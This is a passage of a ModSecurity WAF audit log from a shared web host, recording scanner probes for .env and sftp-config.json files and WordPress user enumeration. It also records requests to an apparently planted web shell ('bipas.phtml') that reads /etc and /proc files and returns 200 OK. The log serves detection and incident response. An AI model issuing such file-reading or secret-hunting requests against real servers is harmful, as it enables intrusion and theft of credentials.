"/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE51z8ZRGs9Zs5Qd_koEfgAAAAA"] Stopwatch: 1749972431789531 2167 (- - -) Stopwatch2: 1749972431789531 2167; combined=1306, p1=320, p2=907, p3=14, p4=19, p5=46, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eccfd740-Z-- --65160e66-A-- [15/Jun/2025:12:59:37.256937 +0530] aE52X8A9_50UwvnTnaENZgAAAAo 196.251.70.66 50802 127.0.0.1 7081 --65160e66-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 196.251.70.66 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --65160e66-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 Cache-Control: no-cache X-Robots-Tag: noindex Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin WPO-Cache-Status: not cached WPO-Cache-Message: Output is too small (less than 255 bytes) to be worth caching, This is a REST API request (identified by REST_REQUEST constant), This page returned an HTTP unauthorised response code (401) Cache-Control: private, must-revalidate Connection: close Content-Type: application/json; charset=UTF-8 --65160e66-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.pjsglobal.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.pjsglobal.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.pjsglobal.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE52X8A9_50UwvnTnaENZgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749972575917875 1339145 (- - -) Stopwatch2: 1749972575917875 1339145; combined=2240, p1=405, p2=1742, p3=0, p4=0, p5=93, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --65160e66-Z-- --ba0a166c-A-- [15/Jun/2025:13:05:21.459299 +0530] aE53uFut2VgqlnFqY4KFUwAAABM 40.69.213.19 41420 127.0.0.1 7081 --ba0a166c-B-- GET /hitech-news.com HTTP/1.0 Host: www.retaxis.com X-Real-IP: 40.69.213.19 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=bd36f760d14729f2513f2a84472719ce1749971986; wordpress_test_cookie=WP%20Cookie%20check --ba0a166c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 --ba0a166c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.retaxis.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.retaxis.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/hitech-news.com"] [unique_id "aE53uFut2VgqlnFqY4KFUwAAABM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749972920377989 1081378 (- - -) Stopwatch2: 1749972920377989 1081378; combined=2424, p1=308, p2=2009, p3=0, p4=0, p5=106, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ba0a166c-Z-- --2b8d8677-A-- [15/Jun/2025:13:11:41.244745 +0530] aE55Nfv6DCq3vcSvN9d6dAAAAAU 35.181.152.185 44454 127.0.0.1 7081 --2b8d8677-B-- GET /sftp-config.json HTTP/1.0 Host: cs.cstechns.com X-Real-IP: 35.181.152.185 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --2b8d8677-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2b8d8677-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cs.cstechns.com"] [uri "/sftp-config.json"] [unique_id "aE55Nfv6DCq3vcSvN9d6dAAAAAU"] Stopwatch: 1749973301240755 4067 (- - -) Stopwatch2: 1749973301240755 4067; combined=2486, p1=753, p2=1655, p3=0, p4=0, p5=78, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b8d8677-Z-- --1b831147-A-- [15/Jun/2025:13:14:28.102125 +0530] aE553N-DHezsSmx4Vom4_wAAAAI 216.73.216.83 34608 127.0.0.1 7081 --1b831147-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fmanpath.config HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1b831147-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4893 Connection: close Content-Type: text/html; charset=UTF-8 --1b831147-H-- Message: Warning. Matched phrase "etc/manpath.config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/manpath.config found within ARGS:viewfile: /etc/manpath.config"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/manpath.config" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/manpath.config found within ARGS:viewfile: /etc/manpath.config"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE553N-DHezsSmx4Vom4_wAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749973468097678 4516 (- - -) Stopwatch2: 1749973468097678 4516; combined=2180, p1=324, p2=1732, p3=35, p4=37, p5=52, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1b831147-Z-- --d033a008-A-- [15/Jun/2025:13:14:59.902556 +0530] aE55-_v6DCq3vcSvN9d65wAAAAU 192.144.34.41 35034 127.0.0.1 7081 --d033a008-B-- GET /.env HTTP/1.0 Host: www.rsda.in X-Real-IP: 192.144.34.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --d033a008-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --d033a008-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.rsda.in"] [uri "/.env"] [unique_id "aE55-_v6DCq3vcSvN9d65wAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749973499493863 408769 (- - -) Stopwatch2: 1749973499493863 408769; combined=1826, p1=401, p2=1333, p3=0, p4=0, p5=91, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d033a008-Z-- --cc57a67d-A-- [15/Jun/2025:13:16:07.626223 +0530] aE56P9-DHezsSmx4Vom5OAAAAAI 52.54.157.23 35546 127.0.0.1 7081 --cc57a67d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/Z99-cloudinit-warnings.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.54.157.23 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --cc57a67d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3350 Connection: close Content-Type: text/html; charset=UTF-8 --cc57a67d-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/z99-cloudinit-warnings.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE56P9-DHezsSmx4Vom5OAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/z99-cloudinit-warnings.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE56P9-DHezsSmx4Vom5OAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749973567620136 6160 (- - -) Stopwatch2: 1749973567620136 6160; combined=3694, p1=472, p2=3002, p3=57, p4=43, p5=119, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cc57a67d-Z-- --5672310a-A-- [15/Jun/2025:13:16:11.625666 +0530] aE56Q7Qynla1sJRjEuG88gAAAAQ 18.205.213.231 54048 127.0.0.1 7081 --5672310a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/irqbalance HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.205.213.231 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5672310a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4032 Connection: close Content-Type: text/html; charset=UTF-8 --5672310a-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/irqbalance"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE56Q7Qynla1sJRjEuG88gAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/irqbalance"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE56Q7Qynla1sJRjEuG88gAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749973571621950 3766 (- - -) Stopwatch2: 1749973571621950 3766; combined=2003, p1=337, p2=1522, p3=35, p4=30, p5=79, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5672310a-Z-- --7b77dc00-A-- [15/Jun/2025:13:25:01.423310 +0530] aE58VcZRGs9Zs5Qd_koIFQAAAAA 216.73.216.83 37228 127.0.0.1 7081 --7b77dc00-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fbash.bashrc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7b77dc00-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4025 Connection: close Content-Type: text/html; charset=UTF-8 --7b77dc00-H-- Message: Warning. Matched phrase "etc/bash.bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/bash.bashrc found within ARGS:viewfile: /etc/bash.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/bash.bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/bash.bashrc found within ARGS:viewfile: /etc/bash.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE58VcZRGs9Zs5Qd_koIFQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974101419051 4315 (- - -) Stopwatch2: 1749974101419051 4315; combined=1911, p1=254, p2=1526, p3=39, p4=30, p5=62, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b77dc00-Z-- --520f9b2f-A-- [15/Jun/2025:13:25:20.541156 +0530] aE58Z7Qynla1sJRjEuG-JAAAAAQ 35.181.43.144 43202 127.0.0.1 7081 --520f9b2f-B-- GET /sftp-config.json HTTP/1.0 Host: infotech.cstechns.com X-Real-IP: 35.181.43.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --520f9b2f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://infotech.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --520f9b2f-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "infotech.cstechns.com"] [uri "/sftp-config.json"] [unique_id "aE58Z7Qynla1sJRjEuG-JAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/infotech.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749974119405071 1136149 (- - -) Stopwatch2: 1749974119405071 1136149; combined=1822, p1=372, p2=1354, p3=0, p4=0, p5=95, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --520f9b2f-Z-- --fc41cb73-A-- [15/Jun/2025:13:25:43.380056 +0530] aE58f00nW1houYLyuKrHCwAAAA0 216.73.216.83 49896 127.0.0.1 7081 --fc41cb73-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc%2Finit.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --fc41cb73-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4782 Connection: close Content-Type: text/html; charset=UTF-8 --fc41cb73-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE58f00nW1houYLyuKrHCwAAAA0"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974143374386 5724 (- - -) Stopwatch2: 1749974143374386 5724; combined=2260, p1=373, p2=1756, p3=39, p4=30, p5=62, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc41cb73-Z-- --d2e6b93b-A-- [15/Jun/2025:13:27:08.554973 +0530] aE581DLduUtIJgHLZtvG3wAAAAE 54.164.106.236 37552 127.0.0.1 7081 --d2e6b93b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/access.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.164.106.236 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --d2e6b93b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4753 Connection: close Content-Type: text/html; charset=UTF-8 --d2e6b93b-H-- Message: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE581DLduUtIJgHLZtvG3wAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974228550276 4750 (- - -) Stopwatch2: 1749974228550276 4750; combined=2418, p1=371, p2=1895, p3=55, p4=38, p5=59, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2e6b93b-Z-- --c994c732-A-- [15/Jun/2025:13:27:14.753092 +0530] aE582X15LOn2YRwTZIj1QAAAAAc 195.181.168.162 36436 127.0.0.1 7081 --c994c732-B-- GET /.env HTTP/1.0 Host: infab.cstechns.com X-Real-IP: 195.181.168.162 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --c994c732-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://infab.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --c994c732-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "infab.cstechns.com"] [uri "/.env"] [unique_id "aE582X15LOn2YRwTZIj1QAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/infab.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749974233679893 1073283 (- - -) Stopwatch2: 1749974233679893 1073283; combined=2222, p1=652, p2=1479, p3=0, p4=0, p5=91, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c994c732-Z-- --77980c58-A-- [15/Jun/2025:13:30:12.240839 +0530] aE59jH15LOn2YRwTZIj1lwAAAAc 216.73.216.83 40428 127.0.0.1 7081 --77980c58-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc&viewfile=%2F%2Fproc%2Fversion_signature HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --77980c58-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2969 Connection: close Content-Type: text/html; charset=UTF-8 --77980c58-H-- Message: Warning. Matched phrase "proc/version" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/version found within ARGS:viewfile: /proc/version_signature"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/version" at ARGS:viewfile. [file 